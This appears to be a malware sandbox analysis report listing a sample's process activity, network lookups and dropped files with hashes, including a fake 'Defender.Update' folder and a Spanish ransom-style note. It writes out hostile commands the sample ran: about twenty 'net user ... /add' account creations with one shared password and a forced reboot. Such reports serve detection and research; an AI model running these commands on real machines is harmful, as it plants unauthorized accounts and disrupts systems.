net user K4$dF27 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user K4$dF27 Maxcheto /add

C:\Windows\system32\net.exe

net user xC78RT Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user xC78RT Maxcheto /add

C:\Windows\system32\net.exe

net user 3nL9$p2x Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add

C:\Windows\system32\net.exe

net user X7hbQ5Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add

C:\Windows\system32\net.exe

net user R2xD1B Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user R2xD1B Maxcheto /add

C:\Windows\system32\net.exe

net user m14T8z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user m14T8z Maxcheto /add

C:\Windows\system32\net.exe

net user L27w8G Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user L27w8G Maxcheto /add

C:\Windows\system32\net.exe

net user P9dR2Y Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user P9dR2Y Maxcheto /add

C:\Windows\system32\net.exe

net user 5QL71t Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 5QL71t Maxcheto /add

C:\Windows\system32\net.exe

net user r8B6V3F Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user r8B6V3F Maxcheto /add

C:\Windows\system32\net.exe

net user 7CXz1b Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 7CXz1b Maxcheto /add

C:\Windows\system32\net.exe

net user n38vJQ Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user n38vJQ Maxcheto /add

C:\Windows\system32\net.exe

net user x6G7P1L Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user x6G7P1L Maxcheto /add

C:\Windows\system32\net.exe

net user M239Wk Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user M239Wk Maxcheto /add

C:\Windows\system32\net.exe

net user 7F2hY4Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add

C:\Windows\system32\net.exe

net user 8QrB1L7 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add

C:\Windows\system32\net.exe

net user t93V6D Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user t93V6D Maxcheto /add

C:\Windows\system32\net.exe

net user 5tG2Q8J Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add

C:\Windows\system32\net.exe

net user x9K1P7L Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user x9K1P7L Maxcheto /add

C:\Windows\system32\net.exe

net user z7R4M3 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user z7R4M3 Maxcheto /add

C:\Windows\system32\shutdown.exe

shutdown /r /f /t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3956855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs

MD5 7c652236d1e09a76cfc27cb2611b80ad
SHA1 f9c359054835b06308165e110cdc5229d4fda8fb
SHA256 4026d4567c422a1281580654d5592d5ce00fce125d8565b7c00ac5f7eb712e4c
SHA512 6a283c0428b91fbc39efbea2c3a793d89de1ae46451acf2c376c8b9b64c946ffa9ec9d83cc154d1647949e2cad79b2de2e3d655286d94ab52089734a92f943fe

C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd

MD5 7835d8ae389b8b78ea4d06c024d63849
SHA1 5a0196e67a8af7185b372aacf5ad817a26546ad1
SHA256 029a47eb246a5d4aa21b9a4ccaffc5103c5d93cd8955869d62d04e4f75612fd1
SHA512 3b5c9ef7a6ec79983475b78e52b0e2c5d059cbcfd6b40832ddad067ed3fbf648507836664d489553372da6bfecc2c697b51b3ec57e5aa4d2939707bfc90c9372

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png

MD5 4947724257526b4226e21ae7541822cd
SHA1 af4db735de48a5069e70758bdfdf41a8214aa346
SHA256 19fbde1e1c5489c3cabc0dcd408f43b789a2e2f89af03a1d4466e55ab1a1faba
SHA512 52986bdd6a21ae6c5c375a8142bb7cd758d537923e8427f0d6fce0763299306a720163246bd2808a1566c3422caefaa28d3d046f2a466baba3305c51d7ff8902

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png

MD5 2f368b76ab153329fb42db70493474b1
SHA1 4c4752399ee2678f6cf4d67affca9dcba59d0023
SHA256 ae8f3768cf4e3af37ad6efedff11f7f2aa6af91239c175a04c1c366b56b8c35f
SHA512 adccaad355c71376490d5d21d788b3921db7c08291c8ef4066ced9c8cf99d188307da49f53fa987ecddd88f9c2b6c191969ad2d34b016aadefac5afd88dc4c6a

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png

MD5 9ef9685c5a578bfdceccaedb0d5fa519
SHA1 713f8621414772eee6602f9fa9ee0a3528d62057
SHA256 6c118f5c5e4cf755ec5da06033a29faf53911c522f5aa3de2da2ae8944a87746
SHA512 2238ee61a60358f5dfb003fbc69099cea7f62ad88f57c4629f022792d6257fef6928df5e613df152258475d1d49aaad6ae24119d1a67a86e0cdf96aafabbddfb

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png

MD5 f346c440007285aff13e1e0512608862
SHA1 4b4a44bc30d37c66dea948bd406effc2bcc63775
SHA256 2f2c6c5d8f57b0816cbf1d8db47d0735951f1d1cbf8d562046677391bac23901
SHA512 34fd2d6734f3825496d3f8d36057832c39052a0cda05efdc44e2d94f45f8b710da790fda4882bfa1eeb3a9971c5207a6a5a567ec4949cd47fd8efbe95f35f032

C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png

MD5 1db691b8c60c5f82f3dae2df999c1c7c
SHA1 c252d4a6e065ab5b122f0ae43f6abdbaad49d80e
SHA256 f2669088bebce7d2624993500bc63677dc1a96a1d733c1df88feff17954b201d
SHA512 3629aaf9e5c40f86c8bdcbfd462a80af19cb883ab2e4b3e3b62f661bedd7c40f4254ae9f274cbd96f3cac2d156cc3a1e5bb3b649bb0df99ecbd93a8ca65330c7

C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png

MD5 908587d867cd053293e2106d70cf42f3
SHA1 83ffc3fc7f61d972b41347ff783a29b41bf13087
SHA256 f622a9159e4b2e792ac772bfc2cfc0ea6c890bad7f7273c916418ce3d425e444
SHA512 541b65da137ed37139146ce27aaaee58dac29892c43b39eb0a0a793ed2d868ca8e24bfe836b133e8941ac72ba8a3e1f6a80e04d30b6dea87846cf86129fda5e8

C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp

MD5 40e2162dfc51fded60ea7b1de3acf588
SHA1 3c0b932a845027db10e67c47c0c9cd45fa80ecbb
SHA256 d0d3a8fd4d52042486c2ff093ca64e99fa54b256a7c551f20a6c3f53f569fbf7
SHA512 453aea922c4801dc7f7defae4be326158abef053a61518f3a7e1d32118130f8f1dc18945c783e20c5b52e4d698613c7ff715ec17e01b5166acc5f380a156047a

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt

MD5 e3a317c88b65b975be8e1c21e149f16d
SHA1 6e7a24a1146ba2800bf0c56ef5b17ea32b01f019
SHA256 b21c998e4c7258fd24a27f0be4d0ddbdcf95a9f2d7b4f041727e241578a410c0
SHA512 1d1228f0f297867b6b134ff8fe5cd493929103098a07beb0edbd63957423dc8536092482d7a061072398bf26e8a5e6a5b3e6fc67439d934671433f4b01208044